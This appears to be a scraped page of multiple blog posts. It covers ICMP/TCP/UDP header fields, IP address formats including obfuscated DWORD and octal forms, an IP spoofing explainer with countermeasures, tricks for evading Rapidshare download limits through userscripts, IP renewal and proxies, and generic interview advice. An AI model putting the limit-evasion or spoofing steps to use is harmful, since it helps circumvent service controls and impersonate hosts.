4 Source Quench
5 Redirect
8 Echo
11 Time Exceeded
12 Parameter Problem
13 Timestamp
14 Timestamp Reply
15 Information Request
16 Information Reply

Checksum :- The checksum is the 16-bit ones's complement of the one's complement sum of the ICMP message starting with the ICMP Type.

RFC 792 :- Please refer to RFC 792 for Internet Control Message Protocol (ICMP) Specification.


TCP-Header

TCP Flags :- C E U A P R S F
C 0x80 Reduced (CWR)
E 0x40 ECN Echo (ECE)
U 0x20 Urgent
A 0x10 Ack
P 0x08 Push
R 0x04 Reset
S 0x02 Syn
F 0x01 Fin

TCP Options :-
0 End of Options List
1 No Operation (NOP, Pad)
2 Maximum Segment Size
3 Window Scale
4 Selective ACK ok
8 Timestamp




Checksum :- Checksum of entire TCP segment and pseudo header (parts of IP header)

Offset :- Number of 32-bit words in TCP header, minimum value of 5. Multiply by 4 to get byte count.

RFC 793 :- Please refer to RFC 793 for Transmission Control Protocol (TCP) Specification.



UDP-Header

Source Port :- an optional field, when meaningful, it indicates the port of the sending process, and may be assumed to be the port to which a reply should be addressed in the absence of any other information. If not used, a value of zero is inserted.

Destination Port :- Destination Port has a meaning within the context of a particular internet destination address.

Length :- Length is the length in octets of this user datagram including this header and the data. (This means the minimum value of the length is eight.)

Checksum :- Checksum is the 16-bit one's complement of the one's complement sum of a pseudo header of information from the IP header, the UDP header, and the data, padded with zero octets at the end (if necessary) to make a multiple of two octets.

RFC 768 :- Please refer to RFC 768 for User Datagram Protocol (UDP) Specification.
��
Links to this post
11:22 AM | Posted in ,
Definition :-
"An Internet Protocol (IP) address is a numerical identification (logical address) that is assigned to devices participating in a computer network utilizing the Internet Protocol for communication between its nodes". -- Wikipedia

The Internet Protocol (IP) has two versions currently in use which are IPv4 and IPv6.
This article represents to IPv4 version only.

In general, an IP address is a 32-bit decimal number that is normally written as four numbers between 1 to 255 (8 bits or 1 byte each), each seperated from the other by a decimal point. This standard is known as "Dotted Decimal Notation".
e.g.- 117.200.77.110

IP addresses are divided into number of ranges/classes as given in the table below-

Class Range
A0.0.0.0 to 126.255.255.255
B128.0.0.0 to 191.255.255.255
C192.0.0.0 to 223.255.255.255
D224.0.0.0 to 239.255.255.255
E240.0.0.0 to 255.255.255.255

e.g.- IP Address 192.168.24.114 belongs to Class 'C'.

How to find out IP Address of your system ?
1) Connect to the Internet.
2) Launch MS-DOS Command Prompt.
3) Type "netstat -n", Press Enter.

You will get the output similar to following-


The IP Address shown in local address field denotes IP Address of your system.
In this case it is 117.200.160.151

IP Address Formats :-
Four different formats of IP Address along with example is as given below-

1) Domain Name System (DNS) :http://tips4hacking.blogspot.com/
2) DWORD Format : 2928008962
3) Octal Format : 0256.0205.0337.002
4) Dotted Decimal Format : 174.133.223.2

Converting DNS IP Address into Normal IP Address :-
You can easily get the IP Address of any domain by various methods such as WHOIS, Netstat, Ping, Traceroute, etc.
Here I have used 'Ping' to get IP Address.

1) Connect to the Internet.
2) Launch MS-DOS Command Prompt.
3) Type "ping domainname", Press Enter.

You will get the output similar to following-



Not all of these formats work in all browsers.
��
Links to this post
11:11 AM | Posted in ,

The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.

Why it works ?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is security weakness in the TCP protocol known as sequence number prediction.

How it works ?
To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.

Internet Protocol (IP) :
It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.
Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contains the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses – specifically the “source address” field.

Transmission Control Protocol (TCP) :
It is the connection-oriented, reliable transport protocol in the TCP/IP suite. Connection-oriented simply means that the two hosts participating in a discussion must first establish a connection via the 3-way handshake (SYN-SYN/ACK-ACK). Reliability is provided by data sequencing and acknowledgement. TCP assigns sequence numbers to every segment and acknowledges any and all data segments recieved from the other end.

As you can see above, the first 12 bytes of the TCP packet, which contain port and sequencing information.

TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of the *first* byte of data in the TCP segment. The acknowledgement number field in the TCP header holds the value of next *expected* sequence number, and also acknowledges *all* data up through this ACK number minus one.

TCP packets can be manipulated using several packet crafting softwares available on the internet.

The Attack
IP-spoofing consists of several steps. First, the target host is choosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.

Spoofing can be implemented by different ways as given below -

Non-Blind Spoofing :- This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately.

Blind Spoofing :- Here the sequence and acknowledgement numbers are unreachable. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers.

Both types of spoofing are forms of a common security violation known as a Man In The Middle Attack. In these attacks, a malicious party intercepts a legitimate communication between two friendly parties. The malicious host then controls the flow of communication and can eliminate or alter the information sent by one of the original participants without the knowledge of either the original sender or the recipient. In this way, an attacker can fool a victim into disclosing confidential information by “spoofing” the identity of the original sender, who is presumably trusted by the recipient.

IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against – Denial of Service attacks, or DoS.


CounterMeasures
1) Filtering at the Router :- Implementing ingress and egress filtering on your border routers is a great place to start your spoofing defense. You will need to implement an ACL (access control list)

2) Encryption and Authentication :- Implementing encryption and authentication will also reduce spoofing threats. Both of these features are included in Ipv6, which will eliminate current spoofing threats.

3) Initial Sequence Number Randomizing.
��
Links to this post
11:05 AM | Posted in
There are two hacks to beat Rapidshare download limits and waiting time.

1) Rapidshare Hack (For Firefox Users) :-
The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment.
But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools.
It changes how Web pages look and act by altering the rendering process.

http://greasemonkey.mozdev.org/

1) Install the Greasemonkey extension>>
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi
2) Restart Firefox
3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html
4) Right click on rapidshare.user.js and choose "Install User Script".
5) Run FireFox.
6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in.
Open it, wait a couple seconds for the install button becomes active.
7) Click on it to install this plug-in then CLOSE FIREFOX.
8) Run FireFox again.
From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'.
9) Open it.
10) Click the Tools Menu then click on Install User Script then click OK.
11) Close FireFox.

The script will let you enjoy "no wait" and multiple file downloads......!


2) Rapidshare Hack (NIC Tricks and MAC Cloning) :-
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day.
To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-

A] Short-Out the JavaScript:
1) Goto the page you want to download
2) Select FREE button
3) In the address bar put this- javascript:alert(c=0)
4) Click OK
5) Click OK to the pop-up box
6) Enter the captcha
7) Download Your File

B] Request a new IP address from your ISP server:
Here’s how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.
6) Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens.
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.
If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

C] Use a proxy with SwitchProxy and Firefox:
1) Download and install Firefox
2) Download and install SwitchProxy
3) Google for free proxies
4) When you hit your download limit, clean your cookies and change your proxy

D] You can use a bookmarklet to stop your wait times:
1) Open IE
2) Right Click On This Link
3) Select Add to Favorites
4) Select Yes to the warning that the bookmark may be unsafe.
5) Name it “RapidShare No Wait”
6) Click on the Links folder (if you want to display it in your IE toolbar)
7) Click OK
8) You may need to close and reopen IE to see it
9) Goto rapidshare and click the bookmarklet when you are forced to wait
Category:
��
Links to this post
2:51 AM | Posted in
1. Tell me about yourself
The most often asked question in interviews. You need to have a short statement prepared in your mind. Be careful that it does not sound rehearsed. Limit it to work-related items unless instructed otherwise. Talk about things you have done and jobs you have held that relate to the position you are interviewing for. Start with the item farthest back and work up to the present.


2. Why did you leave your last job?
Stay positive regardless of the circumstances. Never refer to a major problem with management and never speak ill of supervisors, co-workers or the organization. If you do, you will be the one looking bad. Keep smiling and talk about leaving for a positive reason such as an opportunity, a chance to do something special or other forward-looking reasons.

3. What experience do you have in this field?
Speak about specifics that relate to the position you are applying for. If you do not have specific experience, get as close as you can.

4. Do you consider yourself successful?
You should always answer yes and briefly explain why. A good explanation is that you have set goals, and you have met some and are on track to achieve the others.

5. What do co-workers say about you?
Be prepared with a quote or two from co-workers. Either a specific statement or a paraphrase will work.

6. What do you know about this organization?
This question is one reason to do some research on the organization before the interview. Find out where they have been and where they are going. What are the current issues and who are the major players?

7. What have you done to improve your knowledge in the last year?
Try to include improvement activities that relate to the job. A wide variety of activities can be mentioned as positive self-improvement. Have some good ones handy to mention.

8. Are you applying for other jobs?
Be honest but do not spend a lot of time in this area. Keep the focus on this job and what you can do for this organization. Anything else is a distraction.

9. Why do you want to work for this organization?
This may take some thought and certainly, should be based on the research you have done on the organization. Sincerity is extremely important here and will easily be sensed. Relate it to your long-term career goals.

10. Do you know anyone who works for us?
Be aware of the policy on relatives working for the organization. This can affect your answer even though they asked about friends not relatives. Be careful to mention a friend only if they are well thought of.

11. What kind of salary do you need?
A loaded question. A nasty little game that you will probably lose if you answer first. So, do not answer it. Instead, say something like, That's a tough question. Can you tell me the range for this position? In most cases, the interviewer, taken off guard, will tell you. If not, say that it can depend on the details of the job. Then give a wide range.

12. Are you a team player?
You are, of course, a team player. Be sure to have examples ready. Specifics that show you often perform for the good of the team rather than for yourself are good evidence of your team attitude. Do not brag, just say it in a matter-of-fact tone. This is a key point.

13. How long would you expect to work for us if hired?
Specifics here are not good. Something like this should work: I'd like it to be a long time. Or As long as we both feel I'm doing a good job.

14. Have you ever had to fire anyone? How did you feel about that?
This is serious. Do not make light of it or in any way seem like you like to fire people. At the same time, you will do it when it is the right thing to do. When it comes to the organization versus the individual who has created a harmful situation, you will protect the organization. Remember firing is not the same as layoff or reduction in force.

15. What is your philosophy towards work?
The interviewer is not looking for a long or flowery dissertation here. Do you have strong feelings that the job gets done? Yes. That's the type of answer that works best here. Short and positive, showing a benefit to the organization.

16. If you had enough money to retire right now, would you?
Answer yes if you would. But since you need to work, this is the type of work you prefer. Do not say yes if you do not mean it.

17. Have you ever been asked to leave a position?
If you have not, say no. If you have, be honest, brief and avoid saying negative things about the people or organization involved.

18. Explain how you would be an asset to this organization
You should be anxious for this question. It gives you a chance to highlight your best points as they relate to the position being discussed. Give a little advance thought to this relationship.

19. Why should we hire you?
Point out how your assets meet what the organization needs. Do not mention any other candidates to make a comparison.

20. Tell me about a suggestion you have made
Have a good one ready. Be sure and use a suggestion that was accepted and was then considered successful. One related to the type of work applied for is a real plus.

21. What irritates you about co-workers?
This is a trap question. Think real hard but fail to come up with anything that irritates you. A short statement that you seem to get along with folks is great.

22. What is your greatest strength?
Numerous answers are good, just stay positive. A few good examples: Your ability to prioritize, Your problem-solving skills, Your ability to work under pressure, Your ability to focus on projects, Your professional expertise, Your leadership skills, Your positive attitude .

23. Tell me about your dream job.
Stay away from a specific job. You cannot win. If you say the job you are contending for is it, you strain credibility. If you say another job is it, you plant the suspicion that you will be dissatisfied with this position if hired. The best is to stay genetic and say something like: A job where I love the work, like the people, can contribute and can't wait to get to work.

24. Why do you think you would do well at this job?
Give several reasons and include skills, experience and interest.

25. What are you looking for in a job?
See answer # 23

26. What kind of person would you refuse to work with?
Do not be trivial. It would take disloyalty to the organization, violence or lawbreaking to get you to object. Minor objections will label you as a whiner.

27. What is more important to you: the money or the work?
Money is always important, but the work is the most important. There is no better answer.

28. What would your previous supervisor say your strongest point is?
There are numerous good possibilities: Loyalty, Energy, Positive attitude, Leadership, Team player, Expertise, Initiative, Patience, Hard work, Creativity, Problem solver

29. Tell me about a problem you had with a supervisor
Biggest trap of all. This is a test to see if you will speak ill of your boss. If you fall for it and tell about a problem with a former boss, you may well below the interview right there. Stay positive and develop a poor memory about any trouble with a supervisor.

30. What has disappointed you about a job?
Don't get trivial or negative. Safe areas are few but can include: Not enough of a challenge. You were laid off in a reduction Company did not win a contract, which would have given you more responsibility.

31. Tell me about your ability to work under pressure.
You may say that you thrive under certain types of pressure. Give an example that relates to the type of position applied for.

32. Do your skills match this job or another job more closely?
Probably this one. Do not give fuel to the suspicion that you may want another job more than this one.

33. What motivates you to do your best on the job?
This is a personal trait that only you can say, but good examples are: Challenge, Achievement, Recognition

34. Are you willing to work overtime? Nights? Weekends?
This is up to you. Be totally honest.

35. How would you know you were successful on this job?
Several ways are good measures: You set high standards for yourself and meet them. Your outcomes are a success.Your boss tell you that you are successful

36. Would you be willing to relocate if required?
You should be clear on this with your family prior to the interview if you think there is a chance it may come up. Do not say yes just to get the job if the real answer is no. This can create a lot of problems later on in your career. Be honest at this point and save yourself future grief.

37. Are you willing to put the interests of the organization ahead of your own?
This is a straight loyalty and dedication question. Do not worry about the deep ethical and philosophical implications. Just say yes.

38. Describe your management style.
Try to avoid labels. Some of the more common labels, like progressive, salesman or consensus, can have several meanings or descriptions depending on which management expert you listen to. The situational style is safe, because it says you will manage according to the situation, instead of one size fits all.

39. What have you learned from mistakes on the job?
Here you have to come up with something or you strain credibility. Make it small, well intentioned mistake with a positive lesson learned. An example would be working too far ahead of colleagues on a project and thus throwing coordination off.

40. Do you have any blind spots?
Trick question. If you know about blind spots, they are no longer blind spots. Do not reveal any personal areas of concern here. Let them do their own discovery on your bad points. Do not hand it to them.

41. If you were hiring a person for this job, what would you look for?
Be careful to mention traits that are needed and that you have.

42. Do you think you are overqualified for this position?
Regardless of your qualifications, state that you are very well qualified for the position.

43. How do you propose to compensate for your lack of experience?
First, if you have experience that the interviewer does not know about, bring that up: Then, point out (if true) that you are a hard working quick learner.

44. What qualities do you look for in a boss?
Be generic and positive. Safe qualities are knowledgeable, a sense of humor, fair, loyal to subordinates and holder of high standards. All bosses think they have these traits.

45. Tell me about a time when you helped resolve a dispute between others.
Pick a specific incident. Concentrate on your problem solving technique and not the dispute you settled.

46. What position do you prefer on a team working on a project?
Be honest. If you are comfortable in different roles, point that out.

47. Describe your work ethic.
Emphasize benefits to the organization. Things like, determination to get the job done and work hard but enjoy your work are good.

48. What has been your biggest professional disappointment?
Be sure that you refer to something that was beyond your control. Show acceptance and no negative feelings.

49. Tell me about the most fun you have had on the job.
Talk about having fun by accomplishing something for the organization.

50. Do you have any questions for me?
Always have some questions prepared. Questions prepared where you will be an asset to the organization are good. How soon will I be able to be productive? and What type of projects will I be able to assist on? are examples.
��
Links to this post